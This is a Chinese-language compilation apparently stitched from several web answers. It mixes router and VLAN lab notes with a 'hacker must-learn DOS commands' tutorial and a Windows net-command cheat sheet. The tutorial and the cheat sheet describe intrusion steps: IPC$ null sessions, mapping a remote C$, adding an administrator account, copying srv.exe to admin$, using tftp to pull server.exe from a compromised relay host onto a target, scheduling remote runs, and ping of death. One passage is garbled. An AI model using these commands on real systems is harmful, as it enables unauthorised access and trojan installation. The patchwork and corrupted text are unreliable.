網路互聯設備:路由器(不用在區域網)、交換機(二層)、無線AP(access point、無線訪問點、無線橋接器)、Modem(數據機)(不用在區域網)、網關(工作在傳輸層及傳輸層以上)(不用在區域網)
2、網路地址的配置
3、連通性測試
4、共享資源(文件夾、列印機)
Gpedit.msc 組策略編輯器 regedit
開啟Guest帳號:計算機管理本地用戶和組用戶Guest,[屬性]中「帳號已停用」去勾。
取消「使用簡單文件共享」方式:資源管理器工具文件夾選項查看,「使用簡單件共享(推薦)」去勾。
本地安全策略里的一些設置:(1)用戶權利指派--刪除「拒絕從網路訪問這台計算機」的guest帳號。(2)安全選項--「網路訪問:本地帳戶的共享和安全模式」改成「經典:本地用戶自己的身份驗證」(3)安全選項--「帳戶:使用空白密碼的本地用戶只允許進行控制台登錄」設置為「禁用」。(即禁用:沒有密碼的賬戶只能在本機登錄)
六、net命令
Net view \\IP 查看對方區域網的共享資源。
Net view 查看本地區域網的共享資源
Net use x: \\ip\文件夾 映射遠程計算機上文件夾為本機上磁碟(x)。 映射網路驅動器
Net start 啟動遠程主機上服務。
Net stop 關閉遠程主機上服務。
Net user查看有哪些用戶
net user 用戶名密碼/add 建立用戶 (關閉防火牆)
net user guest /active:yes 激活guest用戶
net user 帳戶名 查看指定帳戶的屬性
net user 用戶名 /delete 刪除用戶
net localgroup administrators 用戶名 /add
把「用戶」添加到管理員組中使其具有管理員許可權。
Net time 查看遠程主機當前時間
七、route
Route print 顯示路由表信息 (與netstat /r功能一樣)
Route add 增加一條靜態路由
Route delete 刪除一條路由
Route change 修改路由信息
route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 IF 2
destination mask gateway 最大躍點數 interface
目標 掩碼 網關 介面
route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2
route DELETE 157.0.0.0
route DELETE 3ffe::/32 (ipv6地址)
3ffe:0000: 0000: 0000: 0000: 0000: 0000: 0000 16*8=128
目標地址 下一站(下一跳)
北京 武勝
重慶 萬隆
八、nslookup命令
查詢DNS域名和主機的IP地址
Nslookup www..com 別名
實驗四:靜態路由與默認路由配置
一、 實訓目的
1、 掌握靜態路由的設置
靜態路由是指路由信息由管理員手工配置,而不是路由器通過路由演算法學習得到。適合拓撲結構固定的小規模網路。
2、 掌握默認路由的設置
默認路由也是一種靜態路由,位於路由表最後,當數據包與所有路由信息都不匹配時,就使用默認路由。
靜態路由優於默認路由。
3、 掌握配置命令:
格式:R0(config)#ip route 目的網路 掩碼 下一跳IP地址(一定在鄰近的路由器上)
例:R0(config)#ip route 0.0.0.0 0.0.0.0 172.16.30.254
二、配置訓練:
配置路由器要求:
設備名
埠
IP地址
默認網關
路由器R0
Fa0/0
192.168.1.254/24
Fa0/1
192.168.2.1/24
路由器R1
Fa0/1
192.168.3.1/24
Fa0/0
192.168.2.2/24
路由器R2
Fa0/0
192.168.3.2/24
Fa0/1
192.168.4.254/24
PC0
Fa0/0
192.168.1.1/24
192.168.1.254/24
Pc1
Fa0/0
192.168.4.1/24
192.168.4.254/24
目標網路:192.168.4.0/24 下一跳:192.168.2.2(最近的路由器上面最近的介面)
Ip route 192.168.1.0 255.255.255.0 192.168.2.1
1、 配置靜態路由:
分析:
R0: 192.168.1.0/24與192.168.2.0/24這兩個網路與R0直連,R0能直接判斷,不需要配置靜態路由。但R0不知道192.168.3.0/24與192.168.3.0/24的路由,需要配置下一跳地址。如下:
目標網路:192.168.3.0/24 下一跳地址:192.168.2.2
ip route 192.168.3.0 255.255.255.0 192.168.2.2
目標網路:192.168.4.0/24 下一跳地址:192.168.2.2
R1:請同學們思考,寫出路由。
192.168.4.0 /24 192.168.3.2
192.168.1.0/24 192.168.2.1
R2:請同學們思考,寫出路由。
配置完成後,保存(write),顯示路由(show ip route)。
2、配置默認路由R0為例,
目標網路:192.168.3.0/24 下一跳地址:192.168.2.2
目標網路:192.168.4.0/24 下一跳地址:192.168.2.2
去往這兩個網路的下一跳都是192.168.2.2,我們可以使用一條默認路由來完成這個功能。
目標網路:ip route 0.0.0.0 0.0.0.0 192.168.2.2
R1不適合設置默認路由。(思考:為什麼?)
R2的默認路由:(自行設置)
刪除路由命令:no ip route 目標網路 掩碼 下一跳
Show running-config show ip route
三、總結
進入特權模式 ena
進入全局配置模式 config t
進入介面模式 interface fa0/0
為介面配置IP地址:ip address ip地址
在全局配置模式下配置路由:ip route 目標網路 掩碼 下一跳
怎樣確定下一跳?(最近的路由器上面最近的介面)
實驗五:交換機的VLAN實驗
1、 實驗目的
理解二層交換機的缺陷,理解VLAN並掌握其應用,掌握VLAN的基礎配置。
2、 VLAN基礎知識
(1)、二層交換機的缺陷
二層交換機是一個廣播域(廣播域就是一個廣播幀所能到達的范圍)。過多的廣播幀會發生碰撞,最終將網路資源耗盡。
(2)虛擬區域網(VLAN)
根據功能、部門及應用,將區域網設備從邏輯上劃分成一個網段,一個網段就是一個廣播域,與具體的物理位置無關。這種建立在交換技術上的邏輯網路就是VLAN。
一個VLAN就是一個廣播域,VLAN工作在第二層,VLAN之間通信是通過第三層的路由器來完成的。
VLAN的優點:
安全:敏感數據用戶與其他用戶隔離,降低了泄密的風險。
成本降低:成本高昂的網路升級需求減少,使現有的帶寬和上行鏈路的利用率更高,節約了成本。
性能提高:劃分了VLAN後減少了網路上不必要的流量,提高了性能。
防範廣播風暴:減少了參與廣播風暴的設備數量。
簡化項目管理或應用管理:根據用戶或應用劃分後,VLAN將用戶與網路設備聚合到一起,以支持商業或地域上的需求。
(3)VLAN幀格式
IEEE802.1Q規定:在乙太網報文的目的MAC地址和源MAC地址欄位之後、協議類型欄位之前加入4個位元組的VLAN Tag (VLAN標簽),用來標識VLAN相關信息。
802.3乙太網幀格式:
前導碼
目標MAC地址
源MAC地址
類型
數 據
幀校驗序列
8B
6B
6B
2B
46-1500B
4B
乙太網最小的幀64B,最大的幀1518B
這四個位元組的802.1Q標簽頭包含了2個位元組的標簽協議標識(TPID)和2個位元組的標簽控制信息(TCI)。
標簽協議標識(TPID)(Tag ProtocolIdentifier)是IEEE定義的新的類型,表明這是一個加了802.1Q標簽的幀。TPID包含了一個固定的值0x8100。
標簽控制信息(TCI)是包含的是幀的控制信息,它包含了下面的一些元素:
Priority:這3 位指明幀的優先順序。一共有8種優先順序,0-7。IEEE 802.1Q標准使用這三位信息。
Canonical Format Indicator( CFI ):,CFI值為0說明是規范格式,1為非規范格式。它被用在令牌環/源路由FDDI介質訪問方法中來指示封裝幀中所帶地址的比特次序信息。
VLAN Identified( VLAN ID ):
這是一個12位的域,指明VLAN的ID,取值范圍為0~4095,一共4096個,由於0 和4095 為協議保留取值,所以VLAN ID 的取值范圍為1~4094,網路設備根據報文是否攜帶VLAN tag,及相關信息對報文進行處理,利用VLAN ID識別屬於哪一個VLAN。
(4)劃分方法:
基於交換機埠的劃分:
是最簡單、最有效的劃分方法,按照設備的埠來定義VLAN成員,將指定埠加入VLAN後,該埠就可以轉發該VLAN報文了。
但無法自動解決終端的移動、增加和變更的問題,終端一旦離開這個埠就需要重新定義新埠的VLAN。
基於MAC地址的劃分:(基於用戶的VLAN)
按照報文的源MAC地址來定義VLAN成員,將指定報文加入該VLAN的Tag後發送。通常與安全技術(如802.1X)聯合使用,以實現終端的安全、靈活接入。
雖然操作繁瑣,但可以對VLAN成員實現自動跟蹤。
基於ip子網的劃分:(子網VLAN)
根據報文的源ip地址及子網掩碼進行劃分的。
設備從埠收到Untagged的報文後,根據報文的源ip地址來確定所屬的VLAN,自動劃分到指定的VLAN中傳輸。
此特性主要用於將指定網段或IP地址的報文劃分到VLAN中傳送。
基於協議的劃分(協議VLAN)
根據埠接收報文所屬的協議(族)類型,以及封裝格式來給報文分配不同的VLANID。可用來劃分VLAN的協議有IP、IPX(互聯網分組交換協議,是netware網路的協議)、AT(Appletalk, apple計算機網路協議)等。封裝格式有EthernetⅡ、802.3RAW(novell公司)、802.2LLC、802.2SNAP等。
此特性主要用於將網路中提供的服務類型與VLAN相關聯,以方便管理和維護。
F. 網路安全怎麼學
你可以把網路安全理解成電商行業、教育行業等其他行業一樣,每個行業都有自己的軟體研發,網路安全作為一個行業也不例外,不同的是這個行業的研發就是開發與網路安全業務相關的軟體。
既然如此,那其他行業通用的崗位在安全行業也是存在的,前端、後端、大數據分析等等,也就是屬於上面的第一個分類,與安全業務關系不大的類型。這里我們重點關注下第二種,與安全業務緊密相關的研發崗位。
這個分類下面又可以分為兩個子類型:
做安全產品開發,做防
做安全工具開發,做攻
防火牆、IDS、IPS
WAF(Web網站應用防火牆)
資料庫網關
NTA(網路流量分析)
SIEM(安全事件分析中心、態勢感知)
大數據安全分析
EDR(終端設備上的安全軟體)
DLP(數據泄漏防護)
殺毒軟體
安全檢測沙箱
安全行業要研發的產品,主要(但不限於)有下面這些:
總結一下,安全研發的產品大部分都是用於檢測發現、抵禦安全攻擊用的,涉及終端側(PC電腦、手機、網路設備等)、網路側。
開發這些產品用到的技術主要以C/C++、Java、Python三大技術棧為主,也有少部分的GoLang、Rust。
安全研發崗位,相對其他兩個方向,對網路安全技術的要求要低一些(只是相對,部分產品的研發對安全技能要求並不低),甚至我見過不少公司的研發對安全一無所知。
G. 網路安全
(一)配備防火牆
防火牆是實現網路安全最基本、最經濟、最有效的安全措施之一。設置在不同網路(如可信任的企業內部網和不可信的公共網)或網路安全域之間,是不同網路或網路安全域之間信息的唯一出入口。
防火牆通過制定嚴格的安全策略實現內外網路或內部網路不同信任域之間的隔離與訪問控制。防火牆可以實現單向或雙向控制,還可以針對時間、流量等進行控制,即也可以實現部分的管理功能,如控制企業內部人員佔用網路資源的時間、流量等,而防火牆系統可實現一些高層應用的代理及更細粒的訪問控制。如:防火牆對常用的高層應用(HTTP、FTP)有詳細的控制,如HTTP命令級(GET、POST、HEAD)及URL級,FTP命令級(GET、PUT)及文件控制等。
同時,作為最基本的網路安全設備,防火牆具有自主的操作系統。在遠程配置或通過防火牆進行遠程接入時,防火牆可通過一次性口令認證技術進行認證,確保口令不被竊取。防火牆可以進行基本的入侵檢測,能夠實時監測指定的主機是否遭到網路入侵,並報告檢測出的入侵。對於檢測到對網路的攻擊行為,能夠對攻擊行為進行響應,包括報警、用戶自定義安全策略等。
總之,防火牆集中了包過濾、應用代理、狀態檢測、網路地址轉換(NAT)、用戶身份鑒別、虛擬專用網路(VPN)、用戶許可權控制、安全審計、攻擊檢測、流量控制與計費等功能,可以為不同類型的Internet接入網路提供最有效、最基本的網路安全服務。
(二)掃描系統
對於網路設備、安全設備等網路部件可能存在的安全漏洞,採用網路安全性掃描分析系統可以對網路中所有部件(Web站點,防火牆,路由器,TCP/IP及相關協議服務)進行攻擊性掃描、分析和評估,發現並報告系統存在的弱點和漏洞,評估安全風險,建議補救措施。同樣對於網路操作系統以及資料庫等應用系統可能存在的安全漏洞,可以配備系統安全性掃描分析系統。
(三)病毒防護
計算機病毒的防範是網路安全建設中應該考慮的重要環節之一。反病毒技術包括預防病毒、檢測病毒和殺毒三種技術:
(1)預防病毒技術:預防病毒技術通過自身常駐系統內存,優先獲得系統的控制權,監視和判斷系統中是否有病毒存在,阻止計算機病毒進入計算機系統和對系統進行破壞。
(2)檢測病毒技術:檢測病毒技術是通過對計算機病毒的特徵,如自身校驗、關鍵字、文件長度的變化等來判斷和確定病毒的類型。
(3)殺毒技術:殺毒技術通過對計算機病毒代碼的分析,開發出具有刪除病毒程序並恢復原文件的軟體。
H. 求在DOS下常用的網路命令
黑客必學DOS命令
一、ping命令
在Windows的控制窗口中(Windows 95/98/ME的command解釋器、Windows NT/2000的cmd解釋器),運行ping可以看到這個命令的說明,它是一個探測本地電腦和遠程電腦之間信息傳送速度的命令,這個命令需要TCP/IP協議的支持,ping將會計算一條信息從本地發送到遠程再返回所需要的時間,黑客使用這個命令決定是否對伺服器進行攻擊,因為連接速度過慢會浪費時間、花費過多的上網費用。
另外這個命令還可以透過域名找到對方伺服器的IP地址,我們知道域名只是提供給瀏覽網頁用的,當我們看到一個不錯的域名地址後,要想通過telnet連接它,就必須知道對方的IP地址,這里也要使用ping命令的。
這個命令的基本使用格式可以通過直接運行ping獲得,現在假設目標是http://www.abc.com/,則可以在控制台下輸入ping www.abc.com,經過等待會得到如下信息:
Pinging www.abc.com [204.202.136.32] with 32 bytes of data:
Reply from 204.202.136.32: bytes=32 time=302ms TTL=240
Reply from 204.202.136.32: bytes=32 time=357ms TTL=240
Reply from 204.202.136.32: bytes=32 time=288ms TTL=240
Reply from 204.202.136.32: bytes=32 time=274ms TTL=240
Ping statistics for 204.202.136.32:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 274ms, Maximum = 357ms, Average = 305ms
這些信息的意思是:www.abc.com的IP地址是204.202.136.32,對他發送了四次數據包,數據包的大小是32位元組,每一次返回的時間分別是302ms、357ms、288ms、274ms。綜合看,發送了四個數據包全部返回,最小時間是274ms,最大時間357ms,他們的平均時間是305ms。
這樣黑客就了解了連接對方伺服器使用的時間。另外這個命令還有一些特殊的用法,例如可以通過IP地址反查伺服器的NetBIOS名,現在以211.100.8.87為例,使用ping配合「-a」,在控制台下輸入命令ping -a 211.100.8.87,它的返回結果是:
Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data:
Reply from 211.100.8.87: bytes=32 time=96ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=109ms TTL=120
Ping statistics for 211.100.8.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 96ms, Maximum = 110ms, Average = 106ms
從這個結果會知道伺服器的NetBIOS名稱是POPNET-FBZ9JDFV。另外在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,例如上面的www.abc.com返回的TTL是240,對方的系統很可能是Linux,而第二個目標的TTL是120,那麼說明它使用的系統也許是Windows。
另外ping還有很多靈活的應用,我不在這里過多的介紹,讀者請另行查閱此命令相關幫助文件。
二、net命令:
NET命令是很多網路命令的集合,在Windows ME/NT/2000內,很多網路功能都是以net命令為開始的,通過net help可以看到這些命令的詳細介紹:
NET CONFIG 顯示系統網路設置
NET DIAG 運行MS的DIAGNOSTICS程序顯示網路的DIAGNOSTIC信息
NET HELP 顯示幫助信息
NET INIT 不通過綁定來載入協議或網卡驅動
NET LOGOFF 斷開連接的共享資源
NET LOGON 在WORKGROUP中登陸
NET PASSWORD 改變系統登陸密碼
NET PRINT 顯示或控制列印作業及列印隊列
NET START 啟動服務,或顯示已啟動服務的列表
NET STOP 停止網路服務
NET TIME 使計算機的時鍾與另一台計算機或域的時間同步
NET USE 連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息
NET VER 顯示區域網內正在使用的網路連接類型和信息
NET VIEW 顯示域列表、計算機列表或指定計算機的共享資源列表
這些命令在Win95/98中支持的比較少,只有幾個基本常見的,而在NT或者2000中又元元多於上面的介紹,不過大多數對於初學者也沒有必要掌握,所以我選擇了WindowsME進行介紹,其中最常用到的是NET VIEW和NET USE,通過者兩個命令,學習者可以連接網路上開放了遠程共享的系統,並且獲得資料。這種遠程共享本來是為便捷操作設計的,但是很多網路管理員忽視了它的安全性,所以造成了很多不應該共享的信息的暴露,對於學習者來說,則可以輕易獲得它人電腦上的隱私資料。
例如在控制台下輸入net view \\202.96.50.24則可以獲得對應IP的系統共享目錄,進而找到他們的共享文件,當然這需要202.96.50.24系統的確存在共享目錄,具體如何找到這些存在共享的系統,我將會在後面的文章中進行介紹。
三、telnet和ftp命令:
這兩個命令分別可以遠程對系統進行telnet登陸和ftp登陸,兩種登陸使用的不同的協議,分別屬於兩種不同的網路服務,ftp是遠程文件共享服務,也就是說學習者可以將自己的資料上傳、下載,但是它並沒有過多的權利,無法在遠程電腦上執行上傳的文件;而telnet則屬於遠程登陸服務,也就是說可以登陸到遠程系統上,並獲得一個解釋器許可權,擁有解釋器就意味著擁有了一定的許可權,這種許可權可能是基本的文件操作、也可能是可以控制系統的管理員許可權。
四、netstat命令:
這個程序有助於我們了解網路的整體使用情況。它可以顯示當前正在活動的網路連接的詳細信息,如採用的協議類型、當前主機與遠端相連主機(一個或多個)的IP地址以及它們之間的連接狀態等。 使用netstat ?可以顯示它的命令格式和參數說明:
netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的參數說明如下:
-a 顯示所有主機的埠號;
-e 顯示乙太網統計信息;
-n 以數字表格形式顯示地址和埠;
-p proto 顯示特定的協議的具體使用信息;
-r 顯示本機路由表的內容;
-s 顯示每個協議的使用狀態(包括TCP、UDP、IP);
interval 重新顯示所選的狀態,每次顯示之間的間隔數(單位秒)。
netstat命令的主要用途是檢測本地系統開放的埠,這樣做可以了解自己的系統開放了什麼服務、還可以初步推斷系統是否存在木馬,因為常見的網路服務開放的默認埠輕易不會被木馬佔用,例如:用於FTP(文件傳輸協議)的埠是21;用於TELNET(遠程登錄協議)的埠是23;用於SMTP(郵件傳輸協議)的埠是25;用於DNS(域名服務,即域名與IP之間的轉換)的埠是53;用於HTTP(超文本傳輸協議)的埠是80;用於POP3(電子郵件的一種接收協議)的埠是110;WINDOWS中開放的埠是139,除此以外,如果系統中還有其他陌生的到口,就可能是木馬程序使用的了。通過netstat或者netstat -a可以觀察開放的埠,如果發現下面的埠,就說明已經有木馬程序在系統中存在:
31337號埠是BackOffice木馬的默認埠;1999是Yai木馬程序;2140或者3150都是DEEP THROAT木馬使用的埠;還有NETBUS、冰河或者SUB7等木馬程序都可以自定義埠,因此發現了陌生埠一定要提高警惕,使用防火牆或者查病毒軟體進行檢測。
五、tracert命令:
這個命令的功能是判定數據包到達目的主機所經過的路徑、顯示數據包經過的中繼節點清單和到達時間。tracert命令的格式如下:
tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
命令行中的參數-d是要求tracert不對主機名進行解析,-h是指定搜索到目的地址的最大輪數,-j的功能是沿著主機列表釋放源路由,-w用來設置超時時間間隔。
通過tracert可以判斷一個伺服器是屬於國內還是國際(網路伺服器的物理未知不能依靠域名進行判斷),根據路由路經可以判斷信息從自己的系統發送到網路上,先後經過了哪些IP到大對方伺服器,這就好像乘公共汽車的時候從起點出發到達終點站的時候,中途會出現很多路牌一個道理,我們清楚了自己的信息的傳送路徑,才能夠更清晰的了解網路、對伺服器進行攻擊。
六、winipcfg:
winipcfg和ipconfig都是用來顯示主機內IP協議的配置信息。只是winipcfg適用於Windows 95/98,而ipconfig適用於Windows NT。winipcfg不使用參數,直接運行它,它就會採用Windows窗口的形式顯示具體信息。這些信息包括:網路適配器的物理地址、主機的IP地址、子網掩碼以及默認網關等,點擊其中的「其他信息」,還可以查看主機的相關信息如:主機名、DNS伺服器、節點類型等。其中網路適配器的物理地址在檢測網路錯誤時非常有用。
ipconfig的命令格式如下:ipconfig [/? | /all | /release [adapter] | /renew [adapter]]
其中的參數說明如下:
使用不帶參數的ipconfig命令可以得到以下信息:IP地址、子網掩碼、默認網關。而使用ipconfig
/? 顯示ipconfig的格式和參數的英文說明;
/all 顯示所有的配置信息;
/release 為指定的適配器(或全部適配器)釋放IP地址(只適用於DHCP);
/renew 為指定的適配器(或全部適配器)更新IP地址(只適用於DHCP)。
/all,則可以得到更多的信息:主機名、DNS伺服器、節點類型、網路適配器的物理地址、主機的IP地址、子網掩碼以及默認網關等。
I. 關於網路安全知識內容
網路安全知識一:密碼安全
無論你是申請郵箱還是玩網路游戲,都少不了要注冊,這樣你便會要填密碼。大多數人都會填一些簡單好記的數字或字母。還把自己的幾個郵箱、幾個qq和網路游戲的密碼都設成一樣。在網上你有可能會因為需要而把密碼告訴朋友,但若那位朋友的好奇心很強的話,他可能會用你給他的這個密碼進入你的其他郵箱或qq,你的網上秘密便成了他舉手可得的資料了。因此建議,你最常用的那個郵箱密碼設置一個不少於7位的有字母、數字和符號組成的沒有規律的密碼,並至少每月改一次。其他不常用的幾個郵箱密碼不要和主郵箱的密碼設成一樣,密碼可以相對簡單點,也可以相同。不過密碼內容千萬不要涉及自己的名字、生日、電話(很多密碼字典都是根據這些資料做出來的)。其他的密碼設置也是同樣道理,最常用的那個密碼要設置的和其他不同,免得被人「一路破」。順便提醒一下,不要把寫有你密碼的那本筆記本放在你認為安全的地方。
網路安全知識二:qq安全
qq是騰訊公司出品的網路即時聊天工具,現在的用戶多的驚人!所以現在針對qq的工具也十分之多。這里在提一下qq的密碼安全,你在申請完qq後第一件事就是去騰訊公司的主頁上的服務專區申請密碼保護,這點很重要,但也很容易被忽略。現在言歸正轉,說qq的安全,在網上用qq查ip地址(ip地址是一個32位二進制數,分為4個8位位元組,是使用tcp/ip協議的網路中用於識別計算機和網路設備的唯一標識)的慮榧??氈欏?q查ip可以用專門的軟體,也可以用防火牆或dos命令,這里不詳細說明。ip被查到後,不懷好意的人可以用各種各樣的炸彈攻擊你,雖然這些攻擊對你的個人隱私沒什麼危害,但常常被人炸下線,這滋味一定不好。解決辦法有兩種:
1.不要讓陌生人或你不信任的人加入你的qq(但這點很不實用,至少我這樣認為)。
2.使用代理伺服器(代理伺服器英文全稱proxy sever,其功能就是代理網路用戶去取得網路信息,更確切地說,就是網路信息的中轉站)。設置方法是點擊qq的菜單==>系統參數==>網路設置==>代理設置==>點擊使用socks5代理伺服器,填上代理伺服器地址和埠號,確定就好了,然後退出qq,再登陸,這就搞定了。qq密碼的破解工具也很多,你只要把密碼設的復雜點,一般不容易被破解。
網路安全知識三:代理伺服器安全
使用代理伺服器後可以很有效的防止惡意攻擊者對你的破壞。但是天下沒有白吃的午餐,因為你再使用代理伺服器後你的上網資料都會記錄在代理服務起的日誌中,要是那個網管想「關照」你一下的話,你是一點生還餘地都沒有的。(除非你進入代理伺服器刪了他的日誌)
網路安全知識四:木馬防範
木馬,也稱為後門,直截了當的說,木馬有二個程序組成:一個是伺服器程序,一個是控制器程序。當你的計算機運行了伺服器後,惡意攻擊者可以使用控制器程序進入如你的計算機,通過指揮伺服器程序達到控制你的計算機的目的。千萬不要小看木馬,它可以所定你的滑鼠、記錄你的鍵盤按鍵、修改注冊表、遠程關機、重新啟動等等功能。想不中木馬,先要了解木馬的傳播途徑:
1:郵件傳播:木馬很可能會被放在郵箱的附件里發給你。因此一般你不認識的人發來的帶有附件的郵件,你最好不要下載運行,尤其是附件名為*.exe的。
2:qq傳播:因為qq有文件傳輸功能,所以現在也有很多木馬通過qq傳播。惡意破壞者通常把木馬伺服器程序通過合並軟體和其他的可執行文件綁在一起,然後騙你說是一個好玩的東東,你接受後運行的話,你就成了木馬的犧牲品了。
3:下載傳播:在一些個人網站下載軟體時有可能會下載到綁有木馬伺服器的東東。所以建議要下載工具的話最好去比較知名的網站。萬一你不幸中了木馬的話,立刻開啟你的殺毒程序,接下來等著木馬殺!殺!殺!。另外手工清除木馬的方法在另外的文章中有詳細說明。
J. 網路命令應用
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
#2 二:
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if 在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
